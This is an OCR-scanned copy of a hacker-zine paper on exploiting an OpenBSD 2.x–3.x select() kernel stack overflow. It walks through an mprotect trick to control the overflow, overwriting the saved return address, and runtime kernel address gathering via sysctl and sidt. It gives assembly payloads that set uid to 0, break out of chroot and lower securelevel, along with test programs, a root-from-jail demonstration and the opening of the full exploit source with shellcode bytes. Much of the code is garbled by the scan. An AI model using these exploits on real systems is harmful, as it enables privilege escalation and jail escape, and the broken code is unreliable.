Armoured with all this knowledge, we can now provide a solution for the 
'big size copyin()’ problem. 


--[ 3.1.1 - mprotect() 4 life! 


x86 cpu memory operations such like trying to read from write only (-w-) 


page or trying to write to a read only (r--) or no access ( ) page and 
some other combinations will throw out a protection fault which will be 
handled by trap() code as shown above. 


This basic functionality will allow us to write as many bytes into kernel 
space as we wish, no matter how big the size value actually is. As seen 
above, the trap() code checks for pcb_onfault handler for protection faults 
and redirects execution to it. In order to stop copying from user land to 
kernel land, we will need to turn off the read protection bit of any 
certain page following the overflow vector and achieve our goal. 


rwx --> Dynamically allocated PAGE_SIZEd 
user land memory 


XXXXXXXXXXX| —--—> Overflow vector (fd_set array) 


fo) 


(saved %Sebp, Seip overwrite values) 


--> Dynamically allocated PAGE_SIZEd 
consecutive memory, PROT_WRITE 


The way to control the overflow as described in the diagram is to allocate 
2 PAGE_SIZEd memory chunks and fill the end of the first page with overflow 
data (exploitation vector) and then turn off the read protection bit of the 
following page. 


At this stage we also run into another problem (albeit rather simple to 
overcome). PAGE_SIZE is 4096 in x86 and 4096 bytes of overflowed stack will 
crash the kernel at an earlier stage (before we take control). 


Actually for this specific overflow saved %tebp and saved %eip is 192 and 
196 bytes away from the overflowed buffer, respectively. So, what we’1ll do 
is allocate 2 pages and pass the fd_set pointer as ’second_page - 200’. 
Then copyin() will start copying just 200 bytes before th nd of the 
readable page and will hit the non readable page right after. An expection 
will be thrown and trap() will handle the fault as explained, ’protection 
fault’ handler will check pcb_onfault and set the instruction pointer of 
the current PCB to the address of the handler, in this case _copy_fault. 


_copy_fault will return EFAULT. 


If we go back to the sys_select() code getbits() macro [4] will check for 
the return value and will go to ’done’ label on any value other than 
success (0). At this point sys_select() set the error code (errno) and 
return to syscall() (syscall dispatcher). 


Here is the test code to verify the mprotect technique: 


include <stdio.h> 
include <sys/types.h> 
include <sys/mman.h> 
include <unistd.h> 


int 
main (void) 
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char *buf; 


u_long pgsz sysconf (_SC_PAG 


ESIZ 


EB) ; 


buf (char *) 
/* asking for 3 pages, 


malloc(pgsz * 3) 
just to 


1’ 


be safe */ 


if('buf) { perror("malloc"); exit(-1); } 
memset (buf, 0x41, pgsz*3); /* 0x41414141 ;) */ 
buf = (char *) (((u_long) buf & “pgsz) + pgsz); 


/* actually, we’r using the 2. 


if (mprotect ((char *) 
PROT_WRITE) 


((u_long) 
< 0) 


ay 


{ 


perror ("mprotect"); 


} 

/* we set the 3rd page as WRIT! 
* anything other than READ is 
“a 


select (0x80000000, (fd_set *) 
NULL, NULL); 
} 


- The ddb> kernel debugger 


To be able to debug the kernel we will 
debugger. Type the fol 
forget that, you shoul 
debug the kernel. (Physical access, 
console devices...) 


ld have some sort 


a 
E 


((u_long) 


console cab] 


and 3. pages*/ 


buf + pgsz), (size_t) pgsz, 


exit (-1); 


only, 
fine 


buf + pgsz - 200), NULL, 


need to set up the ddb kernel 


Llowing commands to make sure ddb is set and don’t 


le access to be able to 
le or those funky network 


of consol] 


bash-2.05a# sysctl -w ddb.panic=1 

ddb.panic: 1 -> 1 

bash-2.05a# sysctl -w ddb.console=1 

ddb.console: 1 -> 1 

The first sysctl command configures ddb to kick in on kernel panics. The 
latter will set up ddb accessible from console at any given time, with the 


ESC+CTRL+ALT key combination. 


xplore kernel 


vulnerabilities without many panic()s 


There is no way to 


getting in the way, so lets get dirty. 


bash-2.05a# gcc -o test2 test2.c 

bash-2.05a# sync 

bash-2.05a# sync 

bash-2.05a# uname -a 

OpenBSD kernfu 3.1 GENERIC#59 i386 

bash-2.05a# ./test2 

uvm_fault (Oxe4536c6c, 0x41414000, 0, 1) —-> e 

kernel: page fault trap, code=0 

Stopped at 0x41414141:uvm_fault (Oxe4536c6c, 0x41414000, 0, 1) —-> e 


ddb> trace 


_kdb_trap(6,0,e462af08,1) at _kdb_trap+0xcl 


_trap() at _trap+0x1b0 
--- trap (number 6) --- 
0x41414141: 

ddb> 


What all this means is that a page faul 
0x41414141 and since this is an 
able to be paged in (such like every il 
to a panic(). This means we are on the 


invalid address for kernel land, 


lt trap was taken from for address 
it was 
Llegal address reference) which le 
right track and indeed overwrit 


not 
ad 
th 
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Seip since the page 0x41414000 was attempted to loaded into memory. 


Type following for a clean reboot. 
ddb> boot sync 


Lets verify that we gain the control by overwriting the %eip here is how 
to set the appropriate breakpoints: 


Hit CTRL+ALT+ESC: 


ddb> x/i _sys_select,130 


_sys_select: pushl Sebp 
_sys_select+0x1: movl Sesp, sebp 
_sys_select+0x424: leave 
_sys_select+0x425: ret 
_sys_select+0x426: nop 


ddb> break _sys_select+0x425 
ddb> cont 

“M -—-> hit enter! 
bash-2.05a# 


At this stage some other process might kick ddb> in because of its use of 
the select syscall, just type ’cont’ on the ddb> prompt and hit CR. 


bash-2.05a# ./test2 


ddb> print Sebp 


41414141 

ddb> x/i Seip 

_sys_select+0x425: ret 

ddb> x/x Sesp 

Oxe461ldf3c: 41414141 --> saved instruction pointer! 


ddb> boot sync 


--[ 3.2 - Payload storage problem 


The payload storage area for user land vulnerabilities is usually the 
overflowed buffer itself (if it’s big enough) or some known user controlled 
other location such like environment variables, pre-overflow command 
leftovers, etc, etc, in short, any user controlled memory that will stay 
resident long enough to reference at a later time. Since the overflowed 
buffer may be small in size, it is not always feasible to store the payload 
there. Actually, for this specific buffer overflow, the contents of the 
overflowed buffer get corrupted leaving us no chance to return to it. Also, 
we will need enough room to execute code in kernel space to be able to do 
complex tasks, such as resetting the chroot pointers, altering pcred, ucred 
and securelevel and resolving where to return to ... for all these reasons 
we are going to execute payload in the source buffer as opposed to the 
destination (overflowed) buffer. This means we’re going to jump to the user 
land page, execute our payload and return back to our caller transparently. 
This is all legitimate execution and we will have almost unlimited space to 
execute our payload. In regards to the select() overflow: copyin(ubuf, 
kbuf, big_num), we’ll execute code inside ’ubuf’. 


--[ 3.3 - Return to user land problem 


After we gain control and execute our payload, we need to clean things up 
and start our journey to user land but this isn’t as easy as it may sound. 
My first approach was to do an ‘iret’ (return from interrupt) in the 
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payload after altering all necessary kernel structures but this approach 
turn out to be real painful. First of all, it’s not an easy task to do all 
the post-syscall handling done by syscall() function. Also, the trap() code 
for kernel to user land transition can not be easily turn into payload 
assembly code. However the most obvious reason, not to choose the ’iret’ 
technique is that messing with important kernel primitives such as locks, 
pending signals and/or mask-able interrupts is a really risky job thus 
drastically reducing the reliability of exploits and increasing the 
potential for post exploitation kernel panics. So I choose to stay out of 
LE 3) 


The solution was obvious, after payload execution we should return to the 
point in syscall() handler where _sys_select() was supposed to return. 
After that point, we don’t need to care about any of the aforementioned 
kernel primitives. This solution leads to the question of how to find out 
where to return into since we have overwritten the return address to gain 
control thus losing our caller’s location. We will explorer many of the 
possible solutions in section 5 and usage of the idtr register for kernel 
land address gathering will be introduced on section 5.2 for some serious 
fun!! Let’s get going 


--[ 4 - Crafting the exploit 


In this section, setting up of proper breakpoints and how to calculate the 
distance to the saved instruction pointer will be discussed. Also, a new 
version of test code will be presented in order to demostrate that 
execution can be successfully directed to the user land buffer. 


--[ 4.1 - Breakpoints & Distance Calculation 


bash-2.05a# nm /bsd | grep _sys_select 
e045f58c T _linux_sys_select 

e0lc5a3c T _sys_select 

bash-2.05a# objdump -d start-address=0xe0lc5a3c --stop- 
address=0xe01c5e63\ 

> /bsd | grep _copyin 


e01lc5b72: e8 £9 a9 £3 ff call e€0100570 <_copyin> 
eO0lc5Sb9f: e8 cc a9 f3 ff call e0100570 <_copyin> 
eOlcSbecc: e8 9f a9 £3 ff call e0100570 <_copyin> 
eOlc5Sbf9: e8 72 a9 £3 ff call e0100570 <_copyin> 
The first copyin() is the one that copies the readfds and overflows the 


kernel stack. That’s the one we are after. 


CTRL+ALT+ESC 
bash-2.05a# Stopped at _Debugger+0x4: leave 
ddb> x/i Oxe01c5b72 


_sys_select+0x136: Call. _copyin 

ddb> break _sys_select+0x136 

ddb> cont 

“M 

bash-2.05a# ./test2 

Breakpoint at _sys_select+0x136: call _copyin 
ddb> x/x Sesp,3 

Oxe461de20: 5£38 e461de78 10000000 


These are the 3 arguments pushed on the stack for copyin() ubuf: 0x5f38 
kbuf: Oxe461lde78 Len:10000000 


ddb> x/x 0x5f38 
Ox5£38: 41414141 


ddb> x/x Sebp 
Oxe461df38: e461dfa8 --> saved %ebp 
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ddb> *M 
Oxe461df3c: e02f34ce -—-> saved %eip 
ddb> 


In the x86 calling convention, 2 longs just before the base pointer are the 


saved eip (return address) and the saved ebp, respectively. To calculate 
the distance between the stack buffer and the saved eip in ddb is done as 
follows: 


ddb> print Oxe46ldf3c - Oxe461de78 
c4 
ddb> boot sync 


The distance between the address of saved "return address" and the kernel 
buffer is 196 (0xc4) bytes. Limiting our copyin() operation to 200 bytes 
with the mprotect() technique will ensure a clean overflow. 


4.2 —- Return address overwrite & execution redirection 


At this stage I’1l introduce another test code to "verify" execution 
redirection and usability of the user land buffer for payload execution. 


test37cs 


include <stdio.h> 
include <sys/types.h> 
include <sys/mman.h> 
include <unistd.h> 


int 
main (void) 
{ 
char *buf; 
long *lptr; 
u_long pgsz = sysconf(_SC_PAGESIZE) ; 


buf = (char *) malloc(pgsz * 3); 
if('buf) { perror("malloc"); exit(-1); } 
memset (buf, Oxcc, pgsz*3); /* int3 */ 


buf = (char *) (((u_long) buf & “pgsz) + pgsz); 


if(mprotect((char *) ((u_long) buf + pgsz), (size_t) pgsz, 
PROT_WRITE) < 0) 


{ 
perror("mprotect"); exit(-1); 


} 


lptr = (long *) ((u_long)buf + pgsz - 8); 
*Iptr Oxbaddcafe; /* saved %ebp, does not 
* matter at this stage 
Ay 
*lptr (long) buf; /* overwrite the return addr 
* with buf’s addr 
+f 
select (0x80000000, (fd_set *) ((u_long) buf + pgsz - 200), NULL, 


NULL, NULL) ; 


test3.c code will overwrite the saved ebp with Oxbaddcafe and the saved 
instruction pointer with the address of the user land buffer, which is 
filled with ’int 3’’s (debug interrupts). This code should kick in the 
kernel debugger. 
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bash-2.05a# gcc -o test3 test3.c 
bash-2.05a# ./test3 


Stopped at 0x5001: int $3 
ddb> x/i Seip,2 

0x5001: int $3 

0x5002: int $3 

ddb> print Sebp 

baddcafe 


ddb> boot sync 


Everything goes as planned, we successfully jump to user land and execute 
code. Now we shall concentrate on other issues such as payload/shellcode 
creation, symbol address gathering on run time, etc... 


-—-[ 5 —- How to gather offsets & symbol addresses 


Before considering what to achieve with kernel payload, I should remind you 
about the previous questions that we raised which was how to return back to 
user land, the proposed solution was basically to fix up %ebp, find out 
where syscall() handler is in memory, plus where in syscall() we should be 
returning. Payload is the obvious place to do the mentioned fix- ups but 
this brings the complication of how to gather kernel addresses. After 
dealing with some insufficient pre-exploitation techniques such like ’nm 
/osd’, kvm_open() and nlist() system interfaces which are all lacking the 
solution for non-reable (in terms of fs permissions) kernel image (/bsd). 

I come to the conclusion that all address gathering should be done on run 
time (in the execution state of the payload). Many win32 folks have been 
doing this type of automation in shellcodes by walking through the thread 
environment block (TEB) for some time. Also kernel structures such like the 
process structure has to be supplied to the payload in order to achieve our 
goals. Following sections would introduce the proposed solutions for kernel 
space address gathering. 


--[ 5.1 - sysctl() syscall 


sysctl() system call will enable us to gather process structure information 
which is needed for the credential and chroot manipulation payloads. In 
this section we will take a brief look into the internals of the sysctl () 
syscall. 

sysctl is a system call to get and set kernel level information from user 


land. It has a good interface to pass data from kernel to user land and 
back. sysctl interface is structured into several sub components such as 
the kernel, hardware, virtual memory, net, filesystem and architecure 
system control interfaces. We’1ll concentrate on the kernel sysctl’s which 
is handled by the kern_sysctl()function. See: sys/kern/kern_sysctl.c:234 
kern_sysctl() function also assigns different handlers to certain queries 
such as proc structure, clockrate, vnode and file information. The process 
structure is handled by the sysctl_doproc() function and this is the 
interface to kernel land information that we are after! 


int 
sysctl_doproc(name, namelen, where, sizep) 
int *name; 
u_int namelen; 
char *where; 
size_t *sizep; 


[1] for (; p != 0; p = LIST_NEXT(p, p_list)) { 
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switch (name [ 
case Kl] 
[3] 
} 
if (bufl 
[4] 
[5] 
void 


fill_eproc(p, ep) 
register struct 
register struct 


register struct 


6] ep->e_paddr 


Also for sysctl_doproc() 
handled by the switch [2 
sufficient enough to gat 
structure. For the selec 
gather the parent proces 
make use of the sysctl () 
later). 


sysctl_doproc() code ite 
structures in order to f 
structures (eproc & kp_p 
land. fill_eproc() (call 
proc address of the quer 
structure, which, in tur 
kinfo_proc structure (wh 
sysctl_doproc() function 
stru res see: sys/sys/ 


ctu 


The 
stru 


following is the fun 
cture: 


void 
get_proc(pid_t pid, 
{ 


stru 


u_int arr[4], len; 
CTL_KI 
KERN_ 
KERN _ 
pid; 
sizeof(str 
if(sysctl(arr, 4 
perror(" 


ER 
PR 
PR 


exit (-1); 
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14 


01) ¢{ 


ERN_PROC_PID: 


/* could do this with just a lookup */ 


if (p->p_pid != (pid_t)name[1]) 
continue; 

break; 

en >= sizeof(struct kinfo_proc)) { 


fill_eproc(p, &eproc); 
error = copyout ((caddr_t)p, &dp->kp_proc, 
sizeof (struct proc)); 


proc *p; 
eproc *ep; 


tty *tp; 


Pr 


there can be different types of queries which are 
] statement. KERN_PROC_PID is the query that is 
her the needed address about any process’s proc 
t() overflow it was sufficient enough just to 

s’s proc address but the setitimer() vulnerability 
interface in many different ways (more on this 


rates through [1] the linked list of proc 
ind the queried pid [3], and, if found, certain 
roc) get filled-in [4], [5] and copyout to user 


ed from [4]) does the trick [6] and copies the 
ied pid into the e_paddr member of the eproc 

n, was eventually copied out to user land in the 
ich is the main data structure for the 

). For further information on members of these 
sysctl.h. 


ction we’ll be using to retrieve the kinfo_proc 


ct kinfo_proc *kp) 


N; 
OC; 
OC_PID; 


uct kinfo_proc); 
kp, &len, NULL, 
sysctl"); 


0) < 0) 


T 


’ 
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It is a pretty straightforward interface, what happens is: CTL_KERN will be 
dispatched to kern_sysctl() by sys_sysctl() KERN_PROC will be dispatched to 
sysctl_doproc() by kern_sysct1l() KERN_PROC_PID will be handled by the 
aforementioned switch statement, eventually returning the kinfo_proc 
structure. 


<rant> 

sysctl() system call might be there with all good intensions such as 
getting and setting kernel information in a dynamic fashion. However, from 
a security point of view, I believe sysctl() syscall should not be blindly 
giving proc information about any queried pid. Credential checks should be 
added in proper places, especially for the systcl_doproc() interface 
</rant> 


--[ 5.2 - sidt technique & _kernel_text search 


As mentioned before, we are after transparent payload execution so that 
_sys_select() will actually return to its caller _syscall() as expected. I 
will explain how to gather the return path in this section. The solution 
depends on the idtr (interrupt descriptor table register) that contains a 
fixed location address, which is the start of the Interrupt Descriptor 
Table (IDT). 


Without going into too many details, IDT is the table that holds the 
interrupt handlers for various interrupt vectors. Each interrupt in x86 is 
represented by a number in the range 0 - 255 and these numbers are called 
the interrupt vectors. These vectors are used to locate the initial handler 
for any given interrupt inside the IDT. IDT contains 256 entries, each 
being 8 bytes. IDT descriptor entries can be 3 different types but we will 
concentrate only on the gate descriptor: 


sys/arch/i386/include/segment .h:99 


struct gate_descriptor { 


unsigned gd_looffset:16; /* gate offset (lsb) */ 

unsigned gd_selector:16; /* gate segment selector */ 

unsigned gd_stkcpy:5; /* number of stack wds to cpy */ 

unsigned gd_xx:3; /* unused */ 

unsigned gd_type:5; /* segment type */ 

unsigned gd_dpl:2; /* segment descriptor priority 
level */ 

unsigned gd_p:1; /* segment descriptor present */ 

unsigned gd_hioffset:16; /* gate offset (msb) */ 


} 


gate_descriptor’s members gd_looffset and gd_hioffset will form the low 
level interrupt handler’s address. For more information on the various 
fields, reader should consult to the architecture manuals [Intel]. 


System call interface to request kernel services is implemented through the 
software initiated interrupt: 0x80. Armored with this knowledge, starting 
from the address of the low level syscall interrupt handler and walking 
through the kernel text, we can find our way to the high level syscall 
handler and finally return to it. 


Interrupt descriptor table under OpenBSD is named _idt_region and slot 
number: Ox80 is the gate descriptor for the system call interrupt ’int 
0x80’. Sinc very member is 8 bytes, system call gate_descriptor is at 
address ’_idt_region + 0x80 * 0x8’ which is ’_idt_region + 0x400’. 


bash-2.05a# Stopped at _Debugger+0x4: leave 
ddb> x/x _idt_region+0x400 
_idt_region+0x400: 80e4c 
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ddb> *M 
_idt_regiont+0x404: e010ef00 


To figure out the initial syscall handler we need to do the proper ’shift’ 
and ’or’ operations on the gate descriptor bit fields, which leads to the 
Oxe0100e4c kernel address. 


bash-2.05a# Stopped at _Debugger+0x4: leave 
ddb> x/x Oxe0100e4c 


_Xosyscall_end: pushl SOx2 

ddb> *M 

_Xosyscall_endt+t0x2: pushl S0x3 
_Xosyscall_end+0x20: call _syscall 


As per exception or software initiated interrupt, the corresponding vector 
is found in the IDT and the execution is redirected to the handler gathered 
from the gate descriptor. This is an intermediate handler and will 
eventually take us to real handler. As seen at the kernel debugger output, 
the initial handler _Xosyscall_end saves all registers (also some other low 
level stuff) and immediately calls the real handler which is _syscall(). 


We have mentioned that the idtr register always contains the address of the 
_idt_region, here is the way to access its content: 


sidt 0x4 (%edi) 
mov Ox6(%edi),%ebx 


Address of the _idt_region is moved to ebx and IDT can now be referenced 
via ebx. Assembly code to gather the syscall handler starting from the 


initial handler is as follows; 

sidt 0x4 (%edi) 

mov Ox6(%edi), %ebx mov _idt_region is in ebx 

mov 0x400(%ebx) , tedx # idt_region[0x80 * (2*sizeof long) = 0x400] 
mov 0x404(%ebx),%ecx _idt_region[0x404] 

shr S$0x10,%ecx 

sal $0x10,%ecx ecx = gd_hioffset 

sal S$0x10, %edx 

shr $0x10,%edx edx = gd_looffset 

or S$ecx, sedx dx cx | dx = _xXosyscall_end 


At this stage we have successfully found the initial/intermediate handler’s 
location, so the next step is to search through the kernel text, find ’call 
_syscall’, gather the displacement of the call instruction and add it to 
the address of the instruction’s location. Also plus 5 should be added to 
the displacement for the size of the call instruction. 


xor %ecx, SeCcx zero out the counter 

up: 

inc %ecx 

movb (%edx, secx), Sbl bl = _Xosyscall_endt+ 

empb S$0xe8, %bl if bl == Oxe8 : ’call’ 

jne up 

lea (Sedx, secx) , sebx _Xosyscall_end+%ecx: call _syscall 

inc %ecx 

mov (%edx, %ecx) , seCcx take the displacement of the call ins. 

add $0x5,%ecx # add 5 to displacement 

add %ebx, %ecx ecx = _Xosyscall_end+0x20 + disp = _syscall() 
At this stage %ecx holds the address of the real handler _syscall(). The 
next step is to find out where to return inside the syscall() function 


which eventually leads to a broader research on various versions of OpenBSD 
with various kernel compilation options. Luckily, it turns out to be safe 
to search for the ’call *%eax’ instruction inside the _syscall(), because 
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this turns out to be the instruction that dispatches every system call to 
its final handler in every OpenBSD version I have tested. 


For OpenBSD 2.6 through 3.1 kernel code always dispatched the system calls 
with the ’call *%eax’ instruction, which is unique in the scope of 
_syscall() function. 


bash-2.05a# Stopped at _Debugger+0x4: leave 
ddb> x/i _syscall+0x240 

_syscall+0x240: call *Seax 

ddb>cont 


Our goal is now to figure out the offset (0x240 in the above disasm) for 
any kernel version so that we can return to the instruction just after it 
from our payload and achieve our goal. The code to search for ’call *%eax’ 
is as follows: 


_syscall+0x240: ff 

_syscall+0x241: do 0x240->0x241 OBSD3.1 
mov %ecx, sedi ecx is the addr of _syscall 
movw SOxd0ff, tax search for ffd0O ’call *%eax’ 
cld 
mov SOxffffffff, secx 
repnz 
scasw # scan (%edi++) for %ax 


sedi gets incremented one last time before breaking the loop 
sedi contains the instruction address just after ’call *%eax’ 
so return to it!!! 


xor %eax, seax set up the return value = Success ;) 
push %Sedi push Sedi on the stack and return to it 
ret 


Finally, this is all we needed for a clean return. This payload can be used 
for any syscall overflow without requiring any further modification. 


--[ 5.3 - _db_lookup() technique 


This technique introduces no new concepts; it is just another kernel text 
search to find out the address of _db_lookup() -- the kernel land 
equivalent of dlsym(). The search is based on the function fingerprint, 
which is fairly safe on the recent versions on which the code has been 
developed, but it might not work on the older versions. I choose to keep it 
out of the text for brevity’s sake but it’s exact the same ’repnz scas’ 


concept just used in the idtr technique. (for sample code, contact me.) 
--[ 5.4 - /usr/bin/nm, kvm_open(), nlist () 
/usr/bin/nm, kvm library and nlist() library interface can all be used to 


gather kernel land symbols and offsets but, as we already mentioned, they 
all require a readable kernel image and/or additional privileges which in 
most secured systems are not usually avaliable. 


Furthermore, the most obvious problem with these interfaces are that they 
won’t work at all in chroot()ed environments with no privileges (nobody). 
These are the main reasons I have not used these techniques within the 
exploitation phase of privilege escalation and chroot breaking, but after 
establishing full control over the system (uid = 0 and out of jail), I have 
made use of offline binary symbol gathering in order to reset the 
securelevel, more about this later. 
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--[ 5.5 - %Sebp fixup 


After taking care of the saved return address, we need to fix %tebp to 
prevent crashes in later stages (especially in _syscall() code). The proper 
way to calculate %Sebp is to find out the difference between the stack 
pointer and the saved base pointer at the procedur xit and used this 
static number to restore %ebp. For all the versions of OpenBSD 2.6 through 
3.1 this difference was 0x68 bytes. You can simply set a breakpoint on 
_sys_select prolog and another one just before the ’leave’ instruction at 
the epilog and calculate the difference between the %ebp recorded at the 


fo) 


prolog and the %esp recorded just before the epilog. 


lea 0x68(%esp),%ebp # fixup ebp 


Above instruction would be enough to set the Sebp back to its old value. 


--[ 6 - Payload/Shellcode Creation 


In the following sections we’ll develop small payloads that modify certain 
fields of its parent process’ proc structure to achieve elevated privileges 
and break out of chroot/jail environments. Then, we’1ll chain the developed 
assembly code with the sidt code to work our way back to user land and 
enjoy our new privileges. 


--[ 6.1 - What to achieve 


Setting up a jail with nobody privileges and trying to break out of it 
seems like a fairly good goal to achieve. Since all these privilege 
separation terms are brought into OpenBSD with the latest OpenSSH, it would 
be nice to actually demonstrate how trivial it would be to bypass this kind 
of 'protection’ by way of such kernel level vulnerabilities. 


Certain inetd.conf services and OpenSSH are run as nobody/user in a 
chrooted/jailed environment intended to be an additional assurance of 
security. This is a totally false sense of security; jailme.c code follows: 


jailme.c: 


#include <stdio.h> 


int 
main () 
{ 

chdir("/var/tmp/jail"); 

chroot ("/var/tmp/jail"); 

setgroups (NULL, NULL); 

setgid (32767); 

setegid (32767); 

setuid(32767); 

seteuid(32767); 

execl ("/bin/sh", "jailed", NULL); 
} 
bash-2.05a# gcc -o jailme jailme.c 
bash-2.05a# cp jailme /tmp/jailme 
bash-2.05a# mkdir /var/tmp/jail 
bash-2.05a# mkdir /var/tmp/jail/usr 
bash-2.05a# mkdir /var/tmp/jail/bin /var/tmp/jail/usr/lib 
bash-2.05a# mkdir /var/tmp/jail/usr/libexec 
bash-2.05a# cp /bin/sh /var/tmp/jail/bin/ 
bash-2.05a# cp /usr/bin/id /var/tmp/jail/bin/ 
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bash-2.05a# cp /bin/1ls /var/tmp/jail/bin/ 

bash-2.05a# cp /usr/lib/libc.so.28.3 /var/tmp/jail/usr/lib/ 

bash-2.05a# cp /usr/libexec/ld.so /var/tmp/jail/usr/libexec/ 

bash-2.05a# cat >> /etc/inetd.conf 

1024 stream tcp nowait root /tmp/jailme 

ae: 

bash-2.05a# ps aux | grep inetd 

root 19121 0.0 1.1 148 352 pO St 8:19AM 0:00.05 grep 
inetd 

root Ziad ' 0.0. that 64 348 ?? Is 6:00PM 0:00.08 inetd 


bash-2.05a# kill -HUP 27152 
bash-2.05a# nce -v localhost 1024 
Connection to localhost 1024 port [tcp/*] succeeded! 


ls -l / 

total 4 

drwxr-xr-x 2 0 0 512 Dec 9 16:23 bin 
drwxr-xr-x 40 0 512 Dec 9 16:21 usr 
id 

uid=32767 gid=32767 

ps 


jailed: <stdin>[4]: ps: not found 


--[ 6.2 - The payload 


Throughout this section we will introduce all the tiny bits of the complete 
payload. So all these section chained together will form the eventual 
payload, which will be available at the code section (10) of this paper. 


--[ 6.2.1 - p_cred & u_cred 


We’1l start with the privilege elevation section of the payload. Following 
is the payload to update ucred (credentials of user) and pcred (credentials 
of the process) of any given proc structure. Exploit code fills in the proc 
address of its parent process by using the sysctl() system call (discussed 
on 5.1) replacing .long 0x12345678. The following ’call’ and 'pop’ 
instructions will load the address of the given proc structure address into 
sedi. The typical address gathering technique used in almost every PIC 
sshellcode [ALEPH1]. 


call moo 

-long 0x12345678 <-- pproc addr 
.long Oxdeadcafe 

.long Oxbeefdead 


nop 
nop 
nop 
moo: 
pop %edi 
mov (%edi),%ecx parent’s proc addr in ecx 
update p_ruid 
mov 0Ox10(%ecx), %ebx bx p->p_cred 
xor %eax, Seax eax = 0 
mov %eax,0x4 (Sebx) p->p_cred->p_ruid = 0 
tf update cr_uid 
mov (%ebx),%edx ax p->p_cred->pc_ucred 
mov %eax,0x4 (Sedx) p->p_cred->pc_ucred->cr_uid = 0 


--[ 6.2.2 - chroot breaking 
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Next tiny assembly fragment will be the chroot breaker of our complete 
payload. 


Without going into extra detail (time is running out, deadline is within 3 
days ;)), lets take a brief look of how chroot is checked on a per-process 
basis. chroot jails are implemented by filling in the fd_rdir member of the 
filedesc (open files structure) with the desired jail directories vnode 
pointer. When kernel is giving certain services to any process, it checks 
for the existence of this pointer and if it’s filled with a vnode that 
process is handled slightly different and kernel will create the notion of 
a new root directory for this process thus jailing it into a predefined 
directory. For a regular process this pointer is zero / unset. So without 
any further need to go into implementation level details, just setting this 
pointer to NULL means FREEDOM! fd_rdir is referenced through the proc 
structure as follows: 


5 


p->p_fd->fd_rdir 


As with the credentials structure, filedesc is also trivial to access and 
alter, with only 2 instruction additions to our payload. 


# update p->p_fd->fd_rdir to break chroot () 


mov Ox14(%ecx) , %edx edx = p->p_fd 
mov %eax, 0xc (%edx) p->p_fd->fd_rdir = 0 
--[ 6.2.3 - securelevel 


OpenBSD has 4 different securelevels starting from permanently insecure to 
highly secure mode. The system by default runs at level 1 which is the 
secure mode. Secure mode restrictions are as follows: 


securelevel may no longer be lowered except by init 
= /dev/mem and /dev/kmem may not be written to 
7 raw disk devices of mounted file systems are read-only 
7 system immutable and append-only file flags may not be removed 
= kernel modules may not be loaded or unloaded 


Some of these restrictions might complicate further compromise of the 
system. So we should also take care of the securelevel flag and reset it to 
0, which is the insecure level that gives you privileges such as being able 
to load kernel modules to further penetrate the system. 


But there were many problems in run time searching of the address of 
securelevel in memory without false positives so I chose to utilize this 
attack at a later stage. The stage that we get uid 0 and break free out of 
jail, now we have all the interfaces available mentioned in section 5.4 to 
query any kernel symbol and retrieve its address. 


bash-2.05a# /usr/bin/nm /bsd | grep securelevel 
e05cff38 B _securelevel 


For this reason an additional, second stage exploit was crafted (without 
any difference, other then the payload) that executes the following 
assembly routine and returns to user land, using the idtr technique. See 
ex_select_obsd_secl.c in section 10 


call moo 
-long 0x12345678 <-- address of securelevel filled by user 
moo: 
pop %edi 
mov (%edi),%ebx address of securelevel in ebx 
reset security level to 0/insecure 
xor %eax, eax eax = 0 
mov %eax, (%ebx) securelevel = 0 
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--[ 6.3 - Get root & escape jail 


All of the above chained into 2 piece of exploit code. Here is the door to 
freedom! (Exploits and payloads can be found in section 10) 


bash-2.05a# gcc -o ex ex_select_obsd.c 
bash-2.05a# gcc -o ex2 ex_select_obsd_secl.c 
bash-2.05a# cp ex /var/tmp/jail/ 
bash-2.05a# cp ex2 /var/tmp/jail/ 
bash-2.05a# nc -v localhost 1024 

id 

uid=32767 gid=32767 

1s / 

bin 

ex 

ex2 

usr 

./ex 


[*] OpenBSD 2.x - 3.x select() kernel overflow [*] 
[*] by Sinan "noir" Eren -—- noir@olympos.org [es] 


userland: 0x0000df38 parent_proc: 0xe46373a4 
id 

uid=0 (root) gid=32767 (nobody) 

uname -a 
OpenBSD kernfu 3.1 GENERIC#59 i386 
1s / 

-cshrec 

-profile 

altroot 

bin 

boot 

bsd 

dev 

etc 


sysctl kern.securelev 
kern.securelevel = 1 

nm /bsd | grep _securelevel 
e05cff38 B _securelevel 
./ex2 e05cf£38 
sysctl kern.securelev 


kern.securelevel = 0 


i) 


Directly copying the exploit into the jailed environment might seem a bit 
unrealistic but it really is not an issue with system call redirection 
[MAXIMI] or even by using little more imaginative shellcodes, you can 
execute anything from a remote source without any further need for a shell 
interpreter. To the best of my knowledge there is 2 commercial products 
that have already achieved such remote execution simulations. [IMPACT], 
[CANVAS ] 


--[{ 7 - Conclusions 


My goal in writing this paper was try to prove kernel land vulnerabilities 
such as stack overflows and integer conditions can be exploited and lead to 
total control over the system, no matter how strict your user land (i.e., 


6.txt Wed Apr 26 09:43:44 2017 22 


privilege separation) or even kernel land (i.e., chroot, systrace, 
securelevel) enforcements are ... I also tried to contribute to the newly 
raised concepts (greets to Gera) of fail-safe and reusable exploitation 
code generation. 


I would like to end this article with my favorite vuln-dev posting of all 
time: 


Subject: RE: OpenSSH Vulns (new?) Priv seperation 
Lene] 
reducing root-run code from 27000 to 2500 lines is the important part. 
who cares how many holes there are when it is in /var/empty/sshd chroot 
with no possibility of root :) 


XXXXX 


[ I CARE. lol! ;)] 


--[ 8 - Greetings 


Thanks to Dan and Dave for correcting my English and committing many logic 
fixes. Thanks to certain anonymous people for their help and support. 


Greets to: optyx, dan, dave aitel, gera, bind, jeru, #convers 
uberhaxOr, olympos and gsu.linux ppl 


Most thanks of all to goes to Asli for support, help and her never-ending 
affection. Seni Seviyorum, mosirrr!! 
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t+> ./ex_kernel/ex_select_obsd.c 


** OpenBSD 2.x 3.x select() kernel bof exploit 
** Sinan "noir" Eren 
** noir@olympos.org | noir@uberhax0r.net 
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** (c) 2002 
kk 
xx / 
include <stdio.h> 
include <sys/types.h> 
include <sys/time.h> 
include <sys/mman.h> 
include <unistd.h> 
include <sys/param.h> 
include <sys/sysctl.h> 
include <sys/signal.h> 
#include <sys/utsname.h> 
include <sys/stat.h> 
/* kernel_sc.s shellcode */ 
unsigned char shellcode[] = 


"\xe8\x0£\x00\x00\x00\x78\x56\x34\x!1 
"\x90\x90\x90\x5£\x8b\x0f\x8b\x59\x!I 
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L2\xfe\xca\xad\xde\xad\xde\xef\xbe" 
LO\x31\xc0\x89\x43\x04\x8b\x13\x89" 


